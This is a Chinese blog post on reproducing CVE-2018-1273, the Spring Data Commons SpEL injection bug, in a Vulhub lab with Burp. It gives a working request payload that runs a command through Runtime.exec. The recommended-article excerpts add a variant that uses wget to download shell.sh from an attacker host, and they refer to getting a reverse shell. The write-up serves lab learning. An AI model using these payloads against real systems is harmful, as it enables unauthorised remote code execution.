CVE-2018-1273 Spring Data Commons 远程命令执行漏洞复现

最新推荐文章于 2024-05-18 21:26:17 发布
最新推荐文章于 2024-05-18 21:26:17 发布
阅读量798 收藏 3
点赞数
分类专栏: Vulhub 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44023403/article/details/115271261
版权

CVE-2018-1273 Spring Data Commons 远程命令执行漏洞复现

前期准备

工具:burpsuite、firefox浏览器
环境:kali

一、漏洞复现

(1)在Vulhub靶场部署好CVE-2018-1273漏洞(上一篇有写操作步骤),在浏览器节目打开http://ip:端口/users,在注册页面提交任意信息,用burp抓包;
在这里插入图片描述
找到我们提交的数据,之后发送到repeater进行修改数据包;
在这里插入图片描述
构造payload,username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/2333")]=&password=&repeatedPassword=,修改数据包,创建文件,进行发包测试;

在这里插入图片描述
Send之后,返回以下页面时,证实攻击成功;
在这里插入图片描述
进入容器查看文件夹是否创建成功(文件创建成功~):进入Ubuntu环境中,执行docker-compose exec spring bash,进入目录,查看tmp下的目录成功出现2333文件,命令执行成功。
在这里插入图片描述
执行 exit 退出当前用户的命令行环境

关闭docker环境,docker-compose down
在这里插入图片描述

二、总结

用火狐浏览器设置代理,用burp抓包时,一直没能连接到burp,之后发现和靶场端口撞了,之后修改的burp的端口,在启动代理时就能抓包了。

看我的眼色行事
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
poc-cve-2018-1273:CVE-2018-1273的POC
05-15
CVE-2018-1273 Spring Data Commons(1.13至1.13.10之前的版本,2.0至2.0.5的版本以及较早的不受支持的版本)包含由于特殊元素的不正确中和导致的属性绑定器漏洞。 未经身份验证的远程恶意用户(或攻击者)可以针对...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH中的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
spring(CVE-2018-1273)远程代码执行漏洞复现
热门推荐
勤劳的码农的博客
03-12 1万+
Spring DataSpring框架中提供底层数据访问的项目模块,Spring Data Commons 是一个共用的基础模块。此模块对特殊属性处理时会使用SpEl表达式,导致攻击者可以通过构造特殊的URL请求,造成服务端远程代码执行。在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令Spring在补丁中使用更加安全的SimpleEvaluationContext替换了StandardEvaluationContext。
Spring Data Commons远程命令执行漏洞复现CVE-2018-1273
wutiangui的博客
09-10 779
下载文件请求包:username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“/usr/bin/wget -O /tmp/1.sh http://192.168.155.2:8081/shell.sh”)]&password=test&repeatedPassword=test。访问http://192.168.25.128:8080/users,注册,BP抓包。在sh文件所在目录开启http服务。2.开启http服务。
spring:CVE-2018:1273
最新发布
weixin_69670995的博客
05-18 405
使用浏览器访问users,并输入随便东西。在kali上使用vim新建测试txt文件。使用dirsearch工具进行目录扫描。使用python3开启临时http。修改payload,让靶机执行木马。修改payload,提升木马权限。发到重发器,并修改post传参。返回200,上传txt文件成功。修改paylaod,上传木马。执行成功,返回靶机shell。使用burp抓包,点击注册。返回200,上传成功。
spring 代码执行CVE-2018-1273
YouthBelief的博客
11-11 1708
spring 代码执行 CVE-2018-1273spring 代码执行CVE-2018-1273)0x01 漏洞描述0x02 影响范围0x03 漏洞复现wget反弹shell0x04 漏洞修复 spring 代码执行CVE-2018-1273) 0x01 漏洞描述 Spring Expression Language是一个功能强大的表达式 语言支持查询和在运行时操作一个对象图。 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起远程代码执行攻击。 0x02 影
CVE-2018-1273漏洞复现
qq_56426046的博客
09-11 968
搭建好vulhub环境,选择 CVE-2018-1273漏洞通过"docker-compose build"和"docker-compose up -d"拉取环境,之后访问服务器ip:8080/users看环境是否成功。
Spring-CVE_2018_1273
weixin_57567689的博客
10-29 589
Spring-CVE_2018_1273
Spring Data Commons远程命令执行漏洞_CVE-2018-1273(反序列Runtime方法)
weixin_42786460的博客
09-16 373
Spring Data Commons远程命令执行漏洞_CVE-2018-1273(反序列Runtime方法)
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
【vulhub系列】cve-2018-1273S pring Expression Language 漏洞复现
Wiofgb的博客
08-12 296
记录一次cve-2018-1273S pring Expression Language漏洞复现
vulhub中SpringSpring Data Commons 远程命令执行漏洞CVE-2018-1273
weixin_41438728的博客
12-02 1420
vulhub中SpringSpring Data Commons 远程命令执行漏洞CVE-2018-1273漏洞复现漏洞说明漏洞利用条件和方式漏洞影响范围漏洞检测环境搭建漏洞复现漏洞修复 漏洞复现 漏洞说明 漏洞利用条件和方式 漏洞影响范围 漏洞检测 环境搭建 漏洞复现 漏洞修复 ...
001--什么是SpringData
weixin_42288943的博客
04-17 167
1.参考网址:https://blog.csdn.net/zgf19930504/article/details/50537198 2.核心内容: ** Spring Data **是Spring 的一个子项目, 旨在统一和简化对各类型持久化存储, 而不拘泥于是关系型数据库还是NoSQL 数据存储。无论是哪种持久化存储, 数据访问对象(或称作为DAO,...
spring 代码执行CVE-2018-1273复现
weixin_63124284的博客
10-29 1033
Spring Expression Language是一个功能强大的表达式 语言支持查询和在运行时操作一个对象图。 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起远程代码执行攻击。 ​
Spring RCE漏洞分析2(CVE-2018-1273
hldfight
05-07 1913
0x00 前言 继续分析Spring的历史漏洞,本篇记录Spring Data Commons远程代码执行漏洞CVE-2018-1273)的分析。 0x01 环境搭建 使用的Spring Data Example Projects提供的示例代码。 但该项目中包含有15个子模块,如果将其整体导入IDEA,则需要下载所有模块中的依赖,显然这是没有必要的。通过参考这篇文章,发现只需导入web模块中的...
Spring Data Commons 远程命令执行漏洞CVE-2018-1273
黑白的博客
12-20 2563
声明 好好学习,天天向上 漏洞描述 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data CommonsSpring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。 影响范围 · Spring Data Commons 1.13 - 1.13.10 (Ingalls SR10) · Spring Data REST 2.6 - 2

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值